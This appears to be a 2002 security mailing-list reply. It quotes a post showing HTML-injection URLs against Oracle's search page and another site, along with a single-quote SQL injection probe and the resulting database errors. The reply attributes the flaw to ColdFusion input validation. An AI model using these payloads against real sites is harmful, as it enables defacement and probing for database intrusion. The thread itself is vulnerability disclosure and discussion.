Re: Oracle Databases Allow HTML/SQL injection

From: Jim Kovalchuk (raxorat_private)
Date: Tue Apr 16 2002 - 11:27:43 PDT

Next message: N|ghtHawk: "FileSeek cgi script advisory"

Previous message: xfesty: "Re: greek characters buffer overflow, AGAIN!"
In reply to: david evlis reign: "Oracle Databases Allow HTML/SQL injection"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, 16 Apr 2002, david evlis reign wrote:

> 
> # oracle database madness"
> 
> "I only have a few things to say." - davidr
> 
> css in the oracle search engine -->
> 
> http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=css><br><br><br><font%20color%20=%20red><h1>DAVID%20REIGN%20IN%20THE%20Y2K+2</H1></b><br><br><br><br><br><br>&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200
> 
> i get fucked up error messages from this:
> 
> Error generating ctx scoreORA-20000: interMedia Text error: DRG-10800: query 
> failed: DRG-50921: EQUIV operand not a word or another EQUIV expression
> 
> and now, the oracle db, while my hacking was targetted at sql injection i 
> found this:
> 
> Error Diagnostic Information
> ODBC Error Code = S1000 (General error)
> [INTERSOLV][ODBC Oracle driver][Oracle]ORA-01756: quoted string not properly 
> terminated
> 
> The error occurred while processing an element with a general identifier of 
> (CFQUERY), occupying document position (245:5) to (245:130).
> 
> Date/Time: Tue Apr 16 17:37:17 2002
> Browser: Mozilla/4.0 (compatible; MSIE 5.01; Windows 3.1)
> Remote Address: 64.66.85.22
> Template: /content/www/prodn/bigpond/direct/view.cfm
> Query String: ID='54 <-- HAHAH
> 
> with the url:
> 
> http://dsleerf.net/direct/view.cfm?ID='54
> 
> now, why i am laughing:
> 
> http://dsleerf.net/bigpond/direct/view.cfm?ID='54"><br><br><br><br><br><br><br><br><br><font%20color%20=%20red><h1>DAVID%20REIGN%20IN%20THE%20Y2K+2</H1></b><br><br><br><br><br><br>


This looks like an input validation bug in the Cold Fusion code, as i'm
quite sure Oracle doesn't use Cold Fusion for their web applications.

Macromedia's drag and drop IDE isn't security aware yet. 

> 
> the oracle database is shit.
> anyone who uses oracle is shit.
> long live apple.
> 
> -davidr
> 
> 
> 
> _________________________________________________________________
> Join the world’s largest e-mail service with MSN Hotmail. 
> http://www.hotmail.com
>

Next message: N|ghtHawk: "FileSeek cgi script advisory"
Previous message: xfesty: "Re: greek characters buffer overflow, AGAIN!"
In reply to: david evlis reign: "Oracle Databases Allow HTML/SQL injection"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Apr 16 2002 - 13:12:45 PDT